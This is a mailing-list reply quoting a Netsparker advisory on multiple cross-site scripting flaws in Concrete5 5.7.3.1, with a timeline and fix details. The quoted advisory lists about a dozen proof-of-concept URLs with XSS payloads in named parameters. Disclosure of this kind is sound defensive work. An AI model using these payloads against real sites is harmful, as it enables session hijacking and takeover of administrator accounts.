> > Advisory Timeline > -------------------- > 05/03/2015 - First Contact > 06/05/2015 - Vulnerability fixed > 11/05/2015 - Advisory released >
I'm honestly surprised it took their team two months to fix this. I've previously reported issues via HackerOne and they were on it within a day. If anyone else is thinking about whitehatting up Concrete5, you might get a faster response if you go through the HackerOne platform. Also, they're friendly and won't pull a Daniel Kerr move on you if you tell them their code is Swiss cheese. Speaking from experience here. On Wed, May 13, 2015 at 10:29 AM, Onur Yilmaz <[email protected]> wrote: > Information > -------------------- > Advisory by Netsparker. > Name: Multiple XSS Vulnerabilities in Concrete5 > Affected Software : Concrete5 > Affected Versions: 5.7.3.1 and possibly below > Vendor Homepage : https://www.concrete5.org > Vulnerability Type : Cross-site Scripting > Severity : Important > CVE-ID: CVE-2015-2250 > Netsparker Advisory Reference : NS-15-008 > > Description > -------------------- > By exploiting a Cross-site scripting vulnerability the attacker can > hijack a logged in user’s session. This means that the malicious > hacker can change the logged in user’s password and invalidate the > session of the victim while the hacker maintains access. As seen from > the XSS example in this article, if a web application is vulnerable to > cross-site scripting and the administrator’s session is hijacked, the > malicious hacker exploiting the vulnerability will have full admin > privileges on that web application. > > Technical Details > -------------------- > Proof of Concept URLs for cross-site scripting vulnerabilities in > Concrete5: > > URL: > /concrete5.7.3.1/index.php/dashboard/system/conversations/bannedwords/success > Parameter Name: banned_word%5b%5d > Parameter Type: POST > Attack Pattern: '"--></style></scRipt><scRipt>alert(0x000936)</scRipt> > > URL: > /concrete5.7.3.1/index.php/dashboard/reports/logs/view?keywords=&level=&channel='"--></style></scRipt><scRipt>alert(0x0044C4)</scRipt>&level[]=600 > Parameter Name: channel > Parameter Type: GET > Attack Pattern: '"--></style></scRipt><scRipt>alert(0x0044C4)</scRipt> > > URL: > /concrete5.7.3.1/index.php/tools/required/permissions/access_entity?peID=1&pdID=3&accessType='"--></style></scRipt><scRipt>alert(0x00690C)</scRipt> > Parameter Name: accessType > Parameter Type: GET > Attack Pattern: '"--></style></scRipt><scRipt>alert(0x00690C)</scRipt> > > URL: > /concrete5.7.3.1/index.php/dashboard/system/multilingual/setup/load_icon > Parameter Name: msCountry > Parameter Type: POST > Attack Pattern: '"--></style></scRipt><scRipt>alert(0x00D064)</scRipt> > > URL: > /concrete5.7.3.1/index.php/tools/required/permissions/access_entity?accessType='"--></style></scRipt><scRipt>alert(0x00687C)</scRipt>&pkCategoryHandle=block_type > Parameter Name: accessType > Parameter Type: GET > Attack Pattern: '"--></style></scRipt><scRipt>alert(0x00687C)</scRipt> > > URL: > /concrete5.7.3.1/index.php/ccm/system/dialogs/area/design/submit?ccm_token=1423928022:7f9b7c3cb0f6721bab4a0dec86cefaa3&cID=1&arHandle='"--></style></scRipt><scRipt>alert(0x00D33A)</scRipt> > Parameter Name: arHandle > Parameter Type: GET > Attack Pattern: '"--></style></scRipt><scRipt>alert(0x00D33A)</scRipt> > > URL: /concrete5.7.3.1/index.php/dashboard/pages/single > Parameter Name: pageURL: > Parameter Type: POST > Attack Pattern: '"--></style></scRipt><scRipt>alert(0x00627A)</scRipt> > > URL: > /concrete5.7.3.1/index.php/ccm/system/dialogs/area/design?arHandle='"--></style></scRipt><scRipt>alert(0x001D34)</scRipt>&cID=1 > Parameter Name: arHandle > Parameter Type: GET > Attack Pattern: '"--></style></scRipt><scRipt>alert(0x001D34)</scRipt> > > URL: /concrete5.7.3.1/index.php/dashboard/system/seo/searchindex/updated > Parameter Name: SEARCH_INDEX_AREA_METHOD > Parameter Type: POST > Attack Pattern: '" onmouseover= alert(0x00047E) > > URL: > /concrete5.7.3.1/index.php/dashboard/system/optimization/jobs/job_scheduled > Parameter Name: unit > Parameter Type: POST > Attack Pattern: '" onmouseover= alert(0x000C5A) > > URL: /concrete5.7.3.1/index.php/dashboard/system/registration/open/1 > Parameter Name: register_notification_email > Parameter Type: POST > Attack Pattern: '" onmouseover= alert(0x0000DE) > > URL: > /concrete5.7.3.1/index.php/dashboard/extend/connect/"onmouseover="alert(0x00170E) > Parameter Name: URI-BASED > Parameter Type: Full URL: > Attack Pattern: /"onmouseover="alert(0x00170E) > > For more information on cross-site scripting vulnerabilities read the > following article: > > https://www.netsparker.com/web-vulnerability-scanner/vulnerability-security-checks-index/crosssite-scripting-xss/ > > Advisory Timeline > -------------------- > 05/03/2015 - First Contact > 06/05/2015 - Vulnerability fixed > 11/05/2015 - Advisory released > > Solution > -------------------- > Download Concrete5 version 5.7.4 which includes fix for this vulnerability. > > Credits & Authors > -------------------- > These issues have been discovered by Omar Kurt while testing > Netsparker Web Application Security Scanner - > https://www.netsparker.com/web-vulnerability-scanner/ > > About Netsparker > -------------------- > Netsparker finds and reports security issues and vulnerabilities such > as SQL Injection and Cross-site Scripting (XSS) in all websites and > web applications regardless of the platform and the technology they > are built on. Netsparker's unique detection and exploitation > techniques allows it to be dead accurate in reporting hence it's the > first and the only False Positive Free web application security > scanner. For more information visit our website on > https://www.netsparker.com > > -- > Onur Yılmaz - Turkey Manager > > Netsparker Web Application Security Scanner > T: +90 (0)554 873 0482 > > _______________________________________________ > Sent through the Full Disclosure mailing list > https://nmap.org/mailman/listinfo/fulldisclosure > Web Archives & RSS: http://seclists.org/fulldisclosure/ _______________________________________________ Sent through the Full Disclosure mailing list https://nmap.org/mailman/listinfo/fulldisclosure Web Archives & RSS: http://seclists.org/fulldisclosure/
